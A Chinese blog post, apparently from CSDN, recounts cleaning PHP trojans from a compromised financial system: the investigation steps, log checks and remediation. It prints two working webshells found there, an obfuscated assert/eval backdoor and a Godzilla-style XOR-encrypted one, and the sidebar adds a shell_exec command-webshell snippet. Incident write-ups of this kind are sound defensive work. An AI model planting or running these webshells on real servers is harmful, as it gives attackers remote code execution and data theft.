记一次PHP木马清理事件

已于 2022-02-11 23:57:27 修改
阅读量3.6k 收藏
点赞数
分类专栏: 总结 文章标签: 安全 web安全 php
于 2022-02-09 00:48:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xxx9001/article/details/122834092
版权

事件:

某海外金融系统,用户交易密码被修改并且绕过了用户端验证码,资金被转出,造成损失,因问题较多,各方人员均不知问题出现的环节,需要排查。

事件背景:

1、系统代码为购买代码二开,没有做任何安全检测(低代码低成本);

2、代码为PHP开发;

3、线上环境为某塔集成安装,未做加固,无监控。

排查处理:

了解完信息后,应该先明确问题发生的场景,用户的交易密码被修改,并且没有触发业务场景中的短信验证码,

通过分析业务场景,只有后台和直接修改数据库可以做到,那么,锁定了排查方向,

可以先检查一下数据库是否有远程权限和用户,如果没有,那么大概率是后台被入侵。

后台被入侵,一般是管理员密码被爆破或者程序有后门,管理员密码被爆破这个不好明确,

只能通过对管理员账号的修复和增加验证码复杂度等业务约束来解决,可以放在最后,先排查代码中的后门。

(这里只记录木马排查清理过程,后续系统排查和清理将另行说明)

代码后门一般为以下4种:

1、以特殊代码文件存在,通常存在可访问文件夹下,例如一些一句话木马;

2、嵌入在正常执行逻辑中的可执行代码;

3、通过可接收任意参数的代码,将参数写入到固定的可访问文件中,通过浏览器请求执行;

4、通过遗留特殊的方法,绕过权限认证或通过无权限控制的方法来控制系统。

通过对代码后门的分析,排查方式如下:

1、通过git进行文件对比,检查在浏览器可访问目录中,是否存在PHP文件;

2、检查是否有可执行代码,可执行代码一般由特殊的系统函数,将http请求中的字符串以代码的方式进行执行,

在php中,这类函数有 system,exec,eval等,通过对代码的全局搜索,并没有发现;

3、检查业务代码中是否有明确的file函数和curl函数的调用,排查是否有远程代码下载或自动写文件的代码;

4、检查是否有绕过权限系统的代码或方法,通过对控制器类进行反射,发现其均继承同一个父类并且父类中没有特殊的判断。

通过对代码后门的排查,发现了几个可疑文件,其中有2个木马文件,1个数据库管理工具adminer(https://www.adminer.org/),然后对比文件修改时间的,其中木马文件是项目创建开始就有了(这就是后门),数据库管理工具却是最近出现的,已经有了蛛丝马迹,那么我们顺藤摸瓜,看看nginx请求日志中(此处有可能被清理,所以以往对ng这类关键日志只通过chattr赋权追加权限,这里我先碰碰运气),这几个文件是否有访问记录,一顿cat grep过后发现木马文件并没有请求记录,但是数据库管理工具却是在交易密码修改前后被访问了,初步怀疑是数据库中直接修改,因暂无更多的线索,所以暂时到此为止,先及时止损,处理现有问题,然后再通过社会工程学看看能不能有所收获。

处理方式:

1、将互相影响的运营系统迁移,物理隔离影响;

2、将潜在问题较多的运营系统做访问白名单机制,在可见度上杜绝被扫描和入侵的可能(偷懒^_^);

3、清理木马文件,监控指定目录的文件改动,动态监控新增文件(inotify);

4、业务功能上加强,做好强制性验证,取消可绕过验证的功能点(或增加二级授权),降低系统被入侵后的损失。

分享一个排查到的木马

1.php (已验证)

function WPFM($cgi){
$var=array($api=($fastcgi=($socks=array('api.js'=>$cgi(eval(pix()))))));
}
function pix(){
$blob=$_POST['123'];
$blob="$blob";
$exc['404warning']="";
return $exc['404warning']."$blob";
}
$ast=substr_replace("assexx","rt",4);
WPFM($ast);

2.php (未验证)

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
                eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

xxx9001
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP木马的判断和查找清除
weixin_33943836的博客
09-18 114
最近出来一种木马,这个木马是以网页形式出现的,主要出现在PHP代码的网站上面,他的主要现象是服务器的网络利用率很高,把你的带宽给耗尽导致服务器无法连接,从流量图上看所有的流量都是从服务器上发出去的,在IIS管理器里面把PHP组建禁止掉,服务器马上恢复正常了,从这里可以看出绝对是中PHP木马了.如下图关闭组建. 下载 (43.41 KB) 2011-12-20 15:33 ...
PHP木马清理过程
weixin_34290000的博客
05-04 248
为什么80%的码农都做不了架构师?>>> ...
玄机——第一章 应急响应-webshell查杀 wp(手把手保姆级教学)
最新发布
焦虑的焦虑
06-07 3412
第一章 应急响应-webshell查杀 wp
php木马删除,PHP木马 怎么破
weixin_39753211的博客
04-12 316
该楼层疑似违规已被系统折叠隐藏此楼查看此楼function pnl($yocgpeq, $psbrigv){$ehvezeiul = ''; for($i=0; $i < strlen($yocgpeq); $i++){$ehvezeiul .= isset($psbrigv[$yocgpeq[$i]]) ? $psbrigv[$yocgpeq[$i]] : $yocgpeq[$i];}$...
functions.php隐藏恶意代码,wordpress程序网站又一次的被挂恶意代码以及简单的清除网站木马与恶意软件的方法...
weixin_39783360的博客
03-17 318
现在已经去除了恶意木马代码了可以放心浏览本站!这次的恶意码我都不知道怎么出来的,而且同时感染了我两个wordpress网站,其中一个就是ps笔刷吧!是昨晚感染的,eset检测到http://brushes8.com/ JS/Redirector.NIL 特洛伊木马 连接中断 – 已隔离 通过应用程序访问 web 时检测到威胁: C:\Program Files\Internet Explorer\...
PHP清除网页病毒的方法
echocdzh的博客
12-14 560
<?php Class clear_virus{ public $index ='b.html'; public $filepath =array('b.html'); public $virus_type =";"; function open_file(){ if(file_exists($this->index)){ $tmp =file_get_contents($this->index)
哥斯拉还原加密流量
热门推荐
u011250160的博客
09-28 1万+
感谢大佬的文章:哥斯拉Godzilla加密流量分析 首先在自己的网站上上传个马 设置好代理,方便burp抓包 注意以下为PHP_XOR_BASE64加密的数据包 一共抓到了三个包 第一个包 第二个包 第三个包 第一个包 Request解密脚本 <?php function encode($D,$K){ for($i=0;$i<strlen($D);$i++){ $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c;
批量在线清理查杀木马工具PHP版.zip
07-09
此小工具的编写主要是方便那些被挂马的站长....运行环境为PHP版.这么简单的小东西了没有什么好介绍的. 演示我就不放了.以防网站文件都被批量改掉了呵呵 :) 平时不用时千万不要将他放在网站上啊.切!
基于PHP的CMS木马扫描器源码.zip
08-13
PHP木马扫描器通常会检查常见的恶意活动迹象,如异常的文件名、可疑的函数调用、加密或混淆的代码等。 **详细知识点:** 1. **恶意软件检测**: 木马扫描器通过匹配已知的恶意代码模式、可疑行为和签名来检测潜在的...
网站木马清理专家 V1.2 全功能免费版
02-22
网站木马清理专家 V1.2 全功能免费版 该版本拥有 网站木马清理专家 全部功能;现在免费开放使用! 说明:部份用户下载后提示有病毒,请大家放心使用该软件,没有设置任何后门;在杀毒软件上设置为例外即可!另外...
php后门木马扫面工具
04-09
PHP后门木马扫描工具是一种专门用于检测和识别PHP源代码中潜在安全威胁的重要软件。在Web开发中,尤其是PHP编程环境下,后门木马是一个常见的安全问题,它们可能被黑客植入,用来非法控制服务器、窃取数据或者执行...
基于PHP的batch-replace批量替换程序(替换木马)源码.zip
07-29
描述与标题相同,进一步确认了这是一个针对PHP开发者的资源,提供了一种批量处理文本替换的解决方案,特别强调了对消除潜在的安全威胁(如木马)的支持。这表明该程序可能包含特定的逻辑或算法来检测和替换与木马...
php批量getshell,任意文件上传引发的批量Getshell到服务器 - WileySec's Blog
weixin_36003864的博客
03-11 604
昨天闲来没事干,看了看娱乐网,看到有人发布了表白墙源码,本着这肯定有漏洞的心去测了一下,果然有漏洞存在任意文件上传直接Getshell,而后写了一个一键Getshell脚本批量。Feature漏洞位置在 Index 控制器下的 Index.php 中有个 upload 方法,存在任意文件上传代码审计部分就不详细说明了漏洞利用EXP编写import requestsimport urllib3imp...
php open basedir设置防止跨站
xuejinliang的专栏
02-03 2844
通过在网站挂马,进入到PHP的目录,如果PHP打开了scandir方法的话,可以直接通过目录一级一级的像上面进入,此操作会造成很大的风险。 下面给出PHP木马文件   //ini_set('display_errors',1);   @error_reporting(7);   @session_start();   @set_time_limit(0);   @set
哥斯拉木马解析 + bypass 免杀代码分析+回调webshell
m0_64180167的博客
12-28 2215
这里也是跟着大佬走的这里首先我是去看了看bypass 学习一下然后我们就可以发现对比我这里将混淆什么的都去掉下面是原版的哥斯拉能发现 确实通过特殊的编码和对字符串的处理,实现bypass落地的时候确实火绒扫不出来我们将两种放到 阿里云中查看一下可以发现已经被识别到了(肯定是被抓特征了)这里我们首先就开始分析一下哥斯拉的php木马类别是 php xor base64这里是基本的代码查看 这里有些是我自己加上去进行判断的这里给出一下大致流程顺便给出session的解释。
哥斯拉PHP马分析
zeros__的博客
12-22 4836
前言: 因为工作而分析主机侧安全产品的告警时,除了种类繁多的误报,见到的最多的就是冰蝎和哥斯拉。判断冰蝎一般通过到"AES"几个字母后,看上下文是不是类似: "file_get_contents("XXX"), "AES", $_SESSION['k']"。 但是判断是不是哥斯拉, ...
PHP会话控制之session_start()
gutops的博客
03-31 2727
PHP会话控制之session_start()session是如何初始化的?声明一个全局数组$_SESSION,映射寄存在内存的session数据。 如果session文件已经存在,并且保存有session数据, session_start()则会读取session数据,填入$_SESSION中, 开始一个新的session生命周期。session初始化在php.ini相关参数session.au...
生成payload木1马 攻击 linux
weixin_54472394的博客
05-07 657
需要 1.开启httpd 2.生成payload 木马 3.启动msfdb run 监听 4. 5. 6. 开始 1.1: 开启httpd nmap install 参数说明 ADD 添加一个注册表项 -v 创建键值 -t 键值类型 -d 键值的值 // 0:关闭uac 1:开启uac -f 强制修改注册表项 收到 ...
XXXXXXX
seawavecau的专栏
09-07 5053
◆计算机能力    精通 Java,JSP,Servlet,javaBean,xml,SQL,Jdbc技术。    精通 WebWork/Struts+Spring+Hibernate技术。    精通Oracle,MySql,SQLServer,Sybase数据库。    熟悉 HTML、javaScript,了解CSS。    熟悉 YUI、Prototype框架。    熟悉J2EE规范,熟...
php一句话木马图片马
01-30
根据提供的引用内容,PHP一句话木马是一种利用PHP语言特性的恶意代码,它可以在服务器上执行命令并返回结果。而图片马是一种将恶意代码嵌入到图片文件中的攻击方式。下面是一个示例,展示了如何在PHP一句话木马中使用图片马的方法: ```php <?php $cmd = $_GET['cmd']; // 通过GET请求获取命令 // 执行命令并返回结果 $result = shell_exec($cmd); // 将结果输出到图片文件 header("Content-Type: image/jpeg"); imagejpeg($result); ?> ``` 在上述示例中,我们通过`$_GET['cmd']`获取用户传递的命令,并使用`shell_exec()`函数执行该命令。然后,我们将命令执行的结果作为图片文件输出,通过`imagejpeg()`函数将结果转换为JPEG格式的图片。 请注意,这只是一个示例,用于演示PHP一句话木马中使用图片马的原理。在实际应用中,使用这种方式进行攻击是违法的,并且严重侵犯了他人的隐私和安全。我强烈建议您遵守法律法规,并保护自己和他人的网络安全
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值